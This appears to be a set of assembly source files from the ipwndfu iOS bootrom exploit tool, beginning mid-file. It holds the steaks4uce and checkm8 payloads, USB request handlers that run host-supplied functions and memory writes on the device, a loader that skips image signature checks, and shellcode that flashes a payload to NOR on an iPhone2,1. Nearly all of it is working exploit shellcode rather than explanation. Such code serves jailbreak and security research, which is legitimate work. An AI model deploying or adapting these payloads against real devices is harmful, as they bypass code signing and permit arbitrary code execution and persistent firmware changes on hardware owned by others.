BLX R3 @ memmove(RELOCATE_SHELLCODE_ADDRESS, R1, RELOCATE_SHELLCODE_SIZE)
LDR R3, =RELOCATE_SHELLCODE_ADDRESS
ADD R3, R3, #1
BX R3 @ goto RELOCATE_SHELLCODE_ADDRESS + 1 (bit 0 set keeps Thumb state)
pwned_dfu_loop:
LDR R3, =clean_data_cache
BLX R3 @ clean_data_cache()
LDR R0, =gVersionString
ADR R1, PWND_STRING
MOV R2, #40
LDR R3, =strlcat /* TODO: do this in a more reasonable way */
BLX R3 @ strlcat(gVersionString, PWND_STRING, 40)
LDR R3, =usb_wait_for_image
LDR R0, =LOAD_ADDRESS
LDR R1, =MAX_SIZE
BLX R3 @ R0 = usb_wait_for_image(LOAD_ADDRESS, MAX_SIZE)
MOV R4, R0 @ R4 = R0
LDR R1, =gLeakingDFUBuffer
LDR R0, [R1] @ R0 = gLeakingDFUBuffer
MOV R2, #0
STR R2, [R1] @ gLeakingDFUBuffer = 0
LDR R3, =free
BLX R3 @ free(R0)
CMP R4, #0
BLT pwned_dfu_loop @ if (R4 < 0) goto pwned_dfu_loop
LDR R5, =LOAD_ADDRESS
LDR R0, [R5] @ R0 = LOAD_ADDRESS[0]
LDR R1, =EXEC_MAGIC
CMP R0, R1
BNE pwned_dfu_not_exec_magic @ if (R0 != EXEC_MAGIC) goto pwned_dfu_not_exec_magic
LDR R0, [R5, #0x8] @ R0 = LOAD_ADDRESS[2] /* arg1 */
LDR R1, [R5, #0xC] @ R1 = LOAD_ADDRESS[3] /* arg2 */
LDR R2, [R5, #0x10] @ R2 = LOAD_ADDRESS[4] /* arg3 */
LDR R3, [R5, #0x14] @ R3 = LOAD_ADDRESS[5] /* arg4 */
LDR R4, [R5, #0x18]
STR R4, [SP] @ SP[0] = LOAD_ADDRESS[6] /* arg5 */
LDR R4, [R5, #0x1C]
STR R4, [SP, #0x4] @ SP[1] = LOAD_ADDRESS[7] /* arg6 */
LDR R4, [R5, #0x20]
STR R4, [SP, #0x8] @ SP[2] = LOAD_ADDRESS[8] /* arg7 */
LDR R4, [R5, #0x4]
BLX R4 @ R0 = LOAD_ADDRESS[1](R0, R1, R2, R3, SP[0], SP[1], SP[2])
STR R0, [R5, #4] @ LOAD_ADDRESS[1] = R0
MOV R1, #0
STR R1, [R5] @ LOAD_ADDRESS[0] = 0
B pwned_dfu_loop @ goto pwned_dfu_loop
pwned_dfu_not_exec_magic:
LDR R0, =LOAD_ADDRESS
MOV R1, R4
MOV R2, #0
LDR R3, =memz_create
BLX R3 @ R0 = memz_create(LOAD_ADDRESS, R4, 0)
CMP R0, #0
BEQ pwned_dfu_loop @ if (R0 == 0) goto pwned_dfu_loop /* out of memory :-| */
LDR R3, =LOAD_ADDRESS
STR R3, [SP] @ SP[0] = LOAD_ADDRESS
STR R4, [SP, #4] @ SP[1] = R4
MOV R4, R0 @ R4 = R0
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CMP R0, #0
BNE load_failed @ if (R0 != 0) goto load_failed
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
load_failed:
MOV R0, R4
LDR R3, =memz_destroy
BLX R3 @ memz_destroy(R4)
B pwned_dfu_loop @ goto pwned_dfu_loop
image3_load_no_signature_check:
PUSH {R4-R7, LR} @ push_registers(R4, R5, R6, R7, LR)
MOV R6, R11
MOV R5, R10
MOV R4, R8
PUSH {R4-R6} @ push_registers(R8, R10, R11)
ADD R7, SP, #0x18 @ R7 = SP + 0x18
LDR R4, =IMAGE3_LOAD_SP_OFFSET
MOV R5, SP
SUB R5, R5, R4
MOV SP, R5 @ SP = SP - IMAGE3_LOAD_SP_OFFSET
MOV R3, #0
LDR R4, =IMAGE3_LOAD_STRUCT_OFFSET
ADD R4, R5, R4
STR R3, [R4] @ *(SP + IMAGE3_LOAD_STRUCT_OFFSET) = 0
STR R2, [SP, #0x10] @ SP[4] = R2
STR R1, [SP, #0x14] @ SP[5] = R1
STR R3, [SP, #0x18] @ SP[6] = 0
LDR R6, [R1] @ R6 = *R1
MOV R10, R1 @ R10 = R1
MOV R11, R3 @ R11 = 0
LDR R1, =MAX_SIZE
MOV R8, R1 @ R8 = MAX_SIZE
LDR R2, [R0, #4]
CMP R2, R1
BGT img3_fail @ if (R0[1] > MAX_SIZE) goto img3_fail
MOV R8, R2 @ R8 = R0[1]
MOV R0, R4
MOV R1, R6
LDR R4, =image3_create_struct
BLX R4
MOV R4, R0 @ R4 = image3_create_struct(SP + IMAGE3_LOAD_STRUCT_OFFSET, R6, R8, 0)
LDR R3, =image3_load_continue @ R3 = image3_load_continue
CMP R4, #0
BEQ img3_branch_R3 @ if (R4 == 0) goto img3_branch_R3
img3_fail:
MOV R4, #1 @ R4 = 1
LDR R3, =image3_load_fail @ R3 = image3_load_fail
img3_branch_R3:
BX R3 @ goto R3
.align 2
PWND_STRING:
.ascii "] PWND:[steaks4uce\x00"
|
n1z19/ipwndfu | 3,423 | src/usb_0xA1_2_arm64.S | .text
.pool
.set USB_CORE_DO_IO, 0xBAD00006
.set LOAD_ADDRESS, 0xBAD00001
.set EXEC_MAGIC, 0xBAD00002
.set MEMC_MAGIC, 0xBAD00004
.set MEMS_MAGIC, 0xBAD00005
.set DONE_MAGIC, 0xBAD00003
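; This handler services the vendor control request 0xA1,2 (the 0x2A1
; halfword checked below is bmRequestType 0xA1 with bRequest 2). The host
; stages a command block at LOAD_ADDRESS; for EXEC_MAGIC the layout is
; roughly as follows (field names are illustrative, not from the source):
;
; struct exec_cmd {
;     uint64_t magic;   /* EXEC_MAGIC in, DONE_MAGIC out */
;     uint64_t func;    /* function pointer in, return value out */
;     uint64_t args[8]; /* passed in X0-X7 */
; };
;
; MEMC_MAGIC/MEMS_MAGIC reuse the first three argument slots as
; (dest, src, length) and (dest, byte, length) respectively.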
.global _main
_main:
jump_back:
BRK #1
BRK #1
LDRH W2, [X0] ; W2 = bmRequestType | bRequest << 8
CMP W2, #0x2A1
BNE jump_back ; if (W2 != 0x2A1) goto jump_back
STP X29, X30, [SP,#-0x10]!
MOV X29, SP
STP X20, X19, [SP,#-0x10]!
MOV X19, X0 ; X19 = setup packet
LDR X20, =LOAD_ADDRESS
MOV W1, #0xFFFF
LDRH W2, [X19,#2] ; W2 = wValue
CMP W1, W2
BNE request_done ; if (wValue != 0xFFFF) goto request_done
LDR X0, [X20] ; X0 = LOAD_ADDRESS[0]
LDR X1, =EXEC_MAGIC
CMP X0, X1
BNE not_exec ; if (X0 != EXEC_MAGIC) goto not_exec
STR XZR, [X20] ; LOAD_ADDRESS[0] = 0
LDR X0, [X20, #0x10] ; X0 = LOAD_ADDRESS[2] /* arg1 */
LDR X1, [X20, #0x18] ; X1 = LOAD_ADDRESS[3] /* arg2 */
LDR X2, [X20, #0x20] ; X2 = LOAD_ADDRESS[4] /* arg3 */
LDR X3, [X20, #0x28] ; X3 = LOAD_ADDRESS[5] /* arg4 */
LDR X4, [X20, #0x30] ; X4 = LOAD_ADDRESS[6] /* arg5 */
LDR X5, [X20, #0x38] ; X5 = LOAD_ADDRESS[7] /* arg6 */
LDR X6, [X20, #0x40] ; X6 = LOAD_ADDRESS[8] /* arg7 */
LDR X7, [X20, #0x48] ; X7 = LOAD_ADDRESS[9] /* arg8 */
LDR X8, [X20, #0x8]
BLR X8 ; X0 = LOAD_ADDRESS[1](X0, X1, X2, X3, X4, X5, X6, X7)
LDR X8, =DONE_MAGIC
STP X8, X0, [X20] ; LOAD_ADDRESS[0,1] = DONE_MAGIC, X0
B request_done
not_exec:
LDR X1, =MEMC_MAGIC
CMP X0, X1
BNE not_memc ; if (X0 != MEMC_MAGIC) goto not_memc
STR XZR, [X20] ; LOAD_ADDRESS[0] = 0
LDP X0, X1, [X20, #0x10] ; X0 = dest, X1 = src
LDR X2, [X20, #0x20] ; X2 = length
BL memcpy ; memcpy(dest, src, length)
LDR X8, =DONE_MAGIC
STR X8, [X20] ; LOAD_ADDRESS[0] = DONE_MAGIC
B request_done
not_memc:
LDR X1, =MEMS_MAGIC
CMP X0, X1
BNE request_done ; if (X0 != MEMS_MAGIC) goto request_done
STR XZR, [X20] ; LOAD_ADDRESS[0] = 0
LDP X0, X1, [X20, #0x10] ; X0 = dest, X1 = fill byte
LDR X2, [X20, #0x20] ; X2 = length
BL memset ; memset(dest, byte, length)
LDR X8, =DONE_MAGIC
STR X8, [X20] ; LOAD_ADDRESS[0] = DONE_MAGIC
B request_done
request_done:
MOV W0, #0x80
MOV X1, X20
LDRH W2, [X19,#6] ; W2 = wLength
MOV X3, #0
LDR X4, =USB_CORE_DO_IO
BLR X4 ; usb_core_do_io(0x80, LOAD_ADDRESS, wLength, 0)
MOV W0, #0
LDP X20, X19, [SP],#0x10
LDP X29, X30, [SP],#0x10
RET
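; The staged word/half/byte memset and memcpy below are carried by the
; payload itself: USB_CORE_DO_IO is the only function placeholder in the
; .set list above, so this file presumably cannot rely on a ROM-provided
; memory routine and brings its own freestanding implementations.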
memset:
MOV X3, #0x101010101010101
AND X1, X1, #0xFF
MUL X1, X1, X3
MOV X3, X0
memset_8:
CMP X2, #8
B.CC memset_4
STR X1, [X0]
ADD X0, X0, #8
SUB X2, X2, #8
B memset_8
memset_4:
CMP X2, #4
B.CC memset_2
STR W1, [X0]
ADD X0, X0, #4
SUB X2, X2, #4
memset_2:
CMP X2, #2
B.CC memset_1
STRH W1, [X0] ; halfword store
ADD X0, X0, #2
SUB X2, X2, #2
memset_1:
CBZ X2, memset_done
STRB W1, [X0] ; byte store
ADD X0, X0, #1
SUB X2, X2, #1
memset_done:
MOV X0, X3
RET
memcpy:
MOV X4, X0
memcpy_8:
CMP X2, #8
B.CC memcpy_4
LDR X3, [X1]
STR X3, [X0]
ADD X0, X0, #8
ADD X1, X1, #8
SUB X2, X2, #8
B memcpy_8
memcpy_4:
CMP X2, #4
B.CC memcpy_2
LDR W3, [X1]
STR W3, [X0]
ADD X0, X0, #4
ADD X1, X1, #4
SUB X2, X2, #4
memcpy_2:
CMP X2, #2
B.CC memcpy_1
LDRH W3, [X1]
STRH W3, [X0]
ADD X0, X0, #2
ADD X1, X1, #2
SUB X2, X2, #2
memcpy_1:
CBZ X2, memcpy_done
LDRB W3, [X1]
STRB W3, [X0]
ADD X0, X0, #1
ADD X1, X1, #1
SUB X2, X2, #1
memcpy_done:
MOV X0, X4
RET
|
n1z19/ipwndfu | 2,701 | src/ibss-flash-nor-shellcode.S | @ ibss-flash-nor-shellcode.S
@ Author: axi0mX
@ Flashes parts of payload to NOR using iPhone2,1 4.3.5 iBSS
@ Parts flashed: 0x0-0x200, 0x8000-0xF3000
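@
@ Rough equivalent of the flow below (a sketch; the function names follow
@ the .set aliases above, not any official API):
@
@   set_bgcolor(0, 160, 0); apply_bgcolor(); /* green while flashing */
@   flash_nor(0x0, 0x200);
@   flash_nor(0x8000, 0x78000);
@   flash_nor(0x80000, 0x73000);
@   reboot_cmd();
@
@ flash_nor() resolves the "nor0" block device and calls its hook at struct
@ offset 0x24 to write size bytes from NOR_PAYLOAD_BASE + offset to NOR.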
.text
.pool
.set reboot_cmd, 0x84000cdd
.set set_bgcolor, 0x8400c6ed
.set apply_bgcolor, 0x8400c789
.set get_block_device, 0x84012c61
.set gNor0String, 0x84014754
.set NOR_PAYLOAD_BASE, 0x41000080
.set NOR_WRITE_1_OFFSET, 0
.set NOR_WRITE_1_SIZE, 0x200
.set NOR_WRITE_2_OFFSET, 0x8000
.set NOR_WRITE_2_SIZE, 0x78000
.set NOR_WRITE_3_OFFSET, 0x80000
.set NOR_WRITE_3_SIZE, 0x73000
.global _start
_start:
.code 16
MOV R0, #0
MOV R1, #160
MOV R2, #0
LDR R3, =set_bgcolor
BLX R3 @ set_bgcolor(0, 160, 0)
LDR R3, =apply_bgcolor
BLX R3 @ apply_bgcolor()
LDR R0, =NOR_WRITE_1_OFFSET
LDR R1, =NOR_WRITE_1_SIZE
BL flash_nor @ flash_nor(NOR_WRITE_1_OFFSET, NOR_WRITE_1_SIZE)
LDR R0, =NOR_WRITE_2_OFFSET
LDR R1, =NOR_WRITE_2_SIZE
BL flash_nor @ flash_nor(NOR_WRITE_2_OFFSET, NOR_WRITE_2_SIZE)
LDR R0, =NOR_WRITE_3_OFFSET
LDR R1, =NOR_WRITE_3_SIZE
BL flash_nor @ flash_nor(NOR_WRITE_3_OFFSET, NOR_WRITE_3_SIZE)
LDR R3, =reboot_cmd
BLX R3 @ reboot_cmd()
/* reboot_cmd should never return */
B spin @ goto spin
flash_nor: @ void flash_nor(R0=offset, R1=size)
PUSH {R4-R5, LR}
MOV R4, R0 @ R4 = R0
MOV R5, R1 @ R5 = R1
LDR R0, =gNor0String
LDR R3, =get_block_device
BLX R3 @ R0 = get_block_device(gNor0String)
CBZ R0, fail @ if (R0 == 0) goto fail
LDR R1, =NOR_PAYLOAD_BASE
ADD R1, R1, R4 @ R1 = NOR_PAYLOAD_BASE + offset
MOV R2, R4 @ R2 = offset
MOV R3, #0
STR R5, [SP] @ SP[0] = size
LDR R4, [R0, #0x24] @ R4 = R0[9]
BLX R4 @ R0 = R0[9](R0, NOR_PAYLOAD_BASE + offset, offset, 0, size)
CMP R0, R5
BNE fail @ if (R0 != R5) goto fail
POP {R4-R5, PC} @ return
fail:
MOV R0, #255
MOV R1, #0
MOV R2, #0
LDR R3, =set_bgcolor
BLX R3 @ set_bgcolor(255, 0, 0)
LDR R3, =apply_bgcolor
BLX R3 @ apply_bgcolor()
spin:
B spin @ while (1)
|
n1z19/ipwndfu | 1,771 | src/checkm8_arm64.S | .text
.pool
.set PAYLOAD_OFFSET, 0xBAD00006
.set PAYLOAD_SIZE, 0xBAD00007
.set PAYLOAD_DEST, 0xBAD00005
.set PAYLOAD_PTR, 0xBAD00008
.set gUSBSerialNumber, 0xBAD00002
.set gUSBSRNMStringDescriptor, 0xBAD00004
.set gUSBDescriptors, 0xBAD00001
.set usb_create_string_descriptor, 0xBAD00003
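// Overview (a sketch, not authoritative): patch the cached USB device
// descriptor in place, append PWND_STRING to gUSBSerialNumber and register
// it as the SRNM string descriptor, then copy the payload embedded at
// _main + PAYLOAD_OFFSET to PAYLOAD_DEST in 0x40-byte chunks with
// data-cache maintenance, and finish with an instruction-cache invalidate
// so the copied code can be executed safely.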
.global _main
_main:
MOV X19, #0 // HACK: do not free this usb request
STP X29, X30, [SP,#-0x10]!
MOV X29, SP
LDR X0, =gUSBDescriptors
LDP X0, X1, [X0]
ADR X2, USB_DESCRIPTOR
LDP X3, X4, [X2]
STP X3, X4, [X0]
STP X3, X4, [X1]
LDP X3, X4, [X2,#0x10]
STP X3, X4, [X0,#0x10]
STP X3, X4, [X1,#0x10]
LDR X0, =gUSBSerialNumber
find_zero_loop:
ADD X0, X0, #1
LDRB W1, [X0]
CBNZ W1, find_zero_loop // advance X0 to the NUL terminator
ADR X1, PWND_STRING
LDP X2, X3, [X1]
STP X2, X3, [X0] // append 16 bytes of PWND_STRING
LDR X0, =gUSBSerialNumber
LDR X1, =usb_create_string_descriptor
BLR X1 // W0 = usb_create_string_descriptor(gUSBSerialNumber)
LDR X1, =gUSBSRNMStringDescriptor
STRB W0, [X1] // publish it as the SRNM string descriptor
LDR X0, =PAYLOAD_DEST
ADR X1, _main
LDR X2, =PAYLOAD_OFFSET
ADD X1, X1, X2 // X1 = _main + PAYLOAD_OFFSET (payload source)
MOV X2, #0 // X2 = bytes copied
LDR X3, =PAYLOAD_SIZE
LDR X4, =PAYLOAD_PTR
ADD X5, X0, #0x18
STR X5, [X4] // *PAYLOAD_PTR = PAYLOAD_DEST + 0x18
copy_loop:
LDP X6, X7, [X1] // X6/X7 as scratch so X3 keeps PAYLOAD_SIZE
STP X6, X7, [X0]
LDP X6, X7, [X1,#0x10]
STP X6, X7, [X0,#0x10]
LDP X6, X7, [X1,#0x20]
STP X6, X7, [X0,#0x20]
LDP X6, X7, [X1,#0x30]
STP X6, X7, [X0,#0x30]
DC CIVAC, X0 // clean+invalidate this chunk by VA
DMB SY
ADD X0, X0, #0x40
ADD X1, X1, #0x40
ADD X2, X2, #0x40
CMP X2, X3
B.CC copy_loop // while (bytes copied < PAYLOAD_SIZE)
SYS #0, c7, c5, #0 // IC IALLU: invalidate the instruction cache
DSB SY
ISB
LDP X29, X30, [SP],#0x10
RET
USB_DESCRIPTOR:
.word 0x190209, 0x80050101, 0x409fa, 0x1fe0000, 0x21070000, 0xa01, 0x8, 0x0
PWND_STRING:
.asciz " PWND:[checkm8]"
|
n1z19/ipwndfu | 2,444 | src/usb_0xA1_2_armv7.S | .text
.pool
.set USB_CORE_DO_IO, 0xBAD00006
.set LOAD_ADDRESS, 0xBAD00001
.set EXEC_MAGIC, 0xBAD00002
.set MEMC_MAGIC, 0xBAD00004
.set MEMS_MAGIC, 0xBAD00005
.set DONE_MAGIC, 0xBAD00003
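@ 32-bit counterpart of usb_0xA1_2_arm64.S. The magic and function/result
@ slots keep their 64-bit width (hence the LDRD/STRD pairs and the check of
@ both words against each magic), while the eight arguments are packed as
@ 32-bit words starting at offset 0x10: arg1..arg4 go in R0-R3, arg5..arg8
@ are spilled to the stack.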
.code 16
.global _main
_main:
jump_back:
BKPT #1
BKPT #1
BKPT #1
BKPT #1
LDRH R2, [R0] @ R2 = bmRequestType | bRequest << 8
MOVW R3, #0x2A1
CMP R2, R3
BNE jump_back @ if (R2 != 0x2A1) goto jump_back
PUSH {R4-R7,LR}
ADD R7, SP, #0xC
SUB SP, SP, #0x10 @ reserve stack for arg5..arg8
MOV R4, R0 @ R4 = setup packet
LDR R5, =LOAD_ADDRESS
MOVW R1, #0xFFFF
LDRH R2, [R4,#2] @ R2 = wValue
CMP R1, R2
BNE request_done @ if (wValue != 0xFFFF) goto request_done
LDRD R0, R1, [R5] @ R0, R1 = both words of LOAD_ADDRESS[0]
LDR R2, =EXEC_MAGIC
CMP R0, R2
BNE not_exec
CMP R1, R2
BNE not_exec @ if (either word != EXEC_MAGIC) goto not_exec
MOV R1, #0
STRD R1, R1, [R5] @ LOAD_ADDRESS[0] = 0
LDRD R0, R1, [R5, #0x20]
LDRD R2, R3, [R5, #0x28]
STRD R0, R1, [SP] @ SP[0..1] = arg5, arg6
STRD R2, R3, [SP, #0x8] @ SP[2..3] = arg7, arg8
LDRD R0, R1, [R5, #0x10] @ R0, R1 = arg1, arg2
LDRD R2, R3, [R5, #0x18] @ R2, R3 = arg3, arg4
LDR R6, [R5, #0x8]
BLX R6 @ R0, R1 = func(arg1, ..., arg8)
LDR R2, =DONE_MAGIC
STRD R0, R1, [R5,#0x8] @ LOAD_ADDRESS[1] = 64-bit result
STRD R2, R2, [R5] @ LOAD_ADDRESS[0] = DONE_MAGIC (both words)
B request_done
not_exec:
LDR R2, =MEMC_MAGIC
CMP R0, R2
BNE not_memc
CMP R1, R2
BNE not_memc @ if (either word != MEMC_MAGIC) goto not_memc
MOV R1, #0
STRD R1, R1, [R5] @ LOAD_ADDRESS[0] = 0
LDRD R0, R1, [R5, #0x10] @ R0 = dest, R1 = src
LDR R2, [R5, #0x18] @ R2 = length
BL memcpy @ memcpy(dest, src, length)
LDR R2, =DONE_MAGIC
STRD R2, R2, [R5] @ LOAD_ADDRESS[0] = DONE_MAGIC
B request_done
not_memc:
LDR R2, =MEMS_MAGIC
CMP R0, R2
BNE request_done
CMP R1, R2
BNE request_done @ if (either word != MEMS_MAGIC) goto request_done
MOV R1, #0
STRD R1, R1, [R5] @ LOAD_ADDRESS[0] = 0
LDRD R0, R1, [R5, #0x10] @ R0 = dest, R1 = fill byte
LDR R2, [R5, #0x18] @ R2 = length
BL memset @ memset(dest, byte, length)
LDR R2, =DONE_MAGIC
STRD R2, R2, [R5] @ LOAD_ADDRESS[0] = DONE_MAGIC
request_done:
MOV R0, #0x80
MOV R1, R5
LDRH R2, [R4,#6] @ R2 = wLength
MOV R3, #0
LDR R4, =USB_CORE_DO_IO
BLX R4 @ usb_core_do_io(0x80, LOAD_ADDRESS, wLength, 0)
MOV R0, #0
ADD SP, SP, #0x10
POP {R4-R7,PC}
memcpy:
CMP R2, #4
BCC memcpy_2
LDR R3, [R1]
STR R3, [R0]
ADD R0, R0, #4
ADD R1, R1, #4
SUB R2, R2, #4
B memcpy
memcpy_2:
CMP R2, #2
BCC memcpy_1
LDRH R3, [R1]
STRH R3, [R0]
ADD R0, R0, #2
ADD R1, R1, #2
SUB R2, R2, #2
memcpy_1:
CBZ R2, memcpy_done
LDRB R3, [R1]
STRB R3, [R0]
ADD R0, R0, #1
ADD R1, R1, #1
SUB R2, R2, #1
memcpy_done:
BX LR
memset:
MOV R3, #0xFF
AND R1, R1, R3
LSL R3, R1, #8
ORR R1, R1, R3
LSL R3, R1, #16
ORR R1, R1, R3
memset_4:
CMP R2, #4
BCC memset_2
STR R1, [R0]
ADD R0, R0, #4
SUB R2, R2, #4
B memset_4
memset_2:
CMP R2, #2
BCC memset_1
STRH R1, [R0]
ADD R0, R0, #2
SUB R2, R2, #2
memset_1:
CBZ R2, memset_done
STRB R1, [R0]
ADD R0, R0, #1
SUB R2, R2, #1
memset_done:
BX LR
|